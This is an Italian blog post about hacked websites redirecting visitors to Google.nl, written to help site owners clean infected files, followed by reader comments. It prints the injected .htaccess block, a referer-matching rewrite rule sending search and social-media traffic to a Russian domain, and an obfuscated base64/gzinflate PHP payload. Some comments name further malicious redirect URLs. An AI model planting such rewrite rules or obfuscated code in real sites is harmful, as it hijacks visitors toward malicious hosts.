Siti hackerati che rimandano a Google.nl

In questi giorni molti siti sono stati attaccati da degli hacker, che hanno apportato modifiche ai files, che gli hanno resi irraggiungibili.

L’attacco ha colpito siti su vari server, sia in Italia che all’estero e, come risultato, molte pagine web rimandavano a Google.nl (Nederland).

Ecco le principali modifiche apportate ai file, e che andranno quindi rimosse per ripristinare la situazione.

Codice aggiunto (o sostituito) all’.htaccess:

#c3284d#
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*

(abacho | abizdirectory | about | acoon | alexana | allesklar | allpages | allthesites | alltheuk | alltheweb | altavista | america | amfibi | aol | apollo7 | aport | arcor | ask | atsearch | baidu | bellnet | bestireland | bhanvad | bing | blog | bluewin | botw | brainysearch | bricabrac | browseireland | chapu | claymont | click4choice | clickey | clickz | clush | confex | cyber-content | daffodil | devaro | dmoz | dogpile | ebay | ehow | eniro | entireweb | euroseek | exalead | excite | express | facebook | fastbot | filesearch | findelio | findhow | finditireland | findloo | findwhat | finnalle | finnfirma | fireball | flemiro | flickr | freenet | friendsreunited | galaxy | gasta | gigablast | gimpsy | globalsearchdirectory | goo | google | goto | gulesider | hispavista | hotbot | hotfrog | icq | iesearch | ilse | infoseek | ireland-information | ixquick | jaan | jayde | jobrapido | kataweb | keyweb | kingdomseek | klammeraffe | km | kobala | kompass | kpnvandaag | kvasir | libero | limier | linkedin | live | liveinternet | lookle | lycos | mail | mamma | metabot | metacrawler | metaeureka | mojeek | msn | myspace | netscape | netzindex | nigma | nlsearch | nol9 | oekoportal | openstat | orange | passagen | pocketflier | qp | qq | rambler | rtl | savio | schnellsuche | search | search-belgium | searchers | searchspot | sfr | sharelook | simplyhired | slider | sol | splut | spray | startpagina | startsiden | sucharchiv | suchbiene | suchbot | suchknecht | suchmaschine | suchnase | sympatico | telfort | telia | teoma | terra | the-arena | thisisouryear | thunderstone | tiscali | t-online | topseven | twitter | ukkey | uwe | verygoodsearch | vkontakte | voila | walhello | wanadoo | web | webalta | web-archiv | webcrawler | websuche | westaustraliaonline | wikipedia | wisenut | witch | wolong | ya | yahoo | yandex | yell | yippy | youtube | zoneru)\.(.*)
RewriteRule ^(.*)$ http://buzzique.ru/in.cgi?16 [R=301,L]
#/c3284d#

Codice aggiunto ad uno o più file php del vostro sito:


#c3284d#
echo(gzinflate(base64_decode(“3U5LDoIwFNyTcIfmbdANjS5cKMVLeIFSnu0z0GJ5FeX0gtzCWU0m8xPiP1CNJtLAgj8
DKmB8s3zol95UqPOsDSb16LmcIjHuioruUfcoxmgUOObhLGWT5pmeCcuYJPnSWLoeTiD8
4lNwm4gZI4ilM3QdeatAJw4gfkVNiC1GBX4RdEfWKzDL3BpwSNaxgiOIiVp2K6sruR2oi
/0lzyq5Pa2/”)));
#/c3284d#

 

Spero di esservi stato utile, e se avete difficoltà nella pulizia delle vostre pagine contattatemi pure.

  • Antonio

    Ma questi non hanno di meglio da fare? Con sto caldo poi :p

  • Lorenz

    Lasciamo stare vah… ed io pure di domenica a lottare con questi…

  • Marta

    Santo subito! :D

  • Sol

    Anche il mio sito ha avuto problemi, ho rimosso il file .htaccess, che tanto non ho mai usato (l’hanno caricato loro) però ancora ci sono anomalie, ora provo a controllare nelle pagine se trovo i codici che hai segnalato. Grazie!

  • Lorenz

    Ciao Sol, vedrai che trovi di sicuro qualcosa di simile, cerca bene, anche in eventuali include php…

  • Incredibile è sucesso anche a alcuni miei siti tipo www-hotel-ristoranti-it
    andando nel mio sito appariva
    http://cyanstream.org/f-av
    http://coderoute.ru/in.cgi?16
    eppoi
    http://www.google.nl/
    ho risolto il problema al sito
    ma ancora nel mio computer con internet explorer rimane per avendo pulito cache invece con mozzilla tutto ok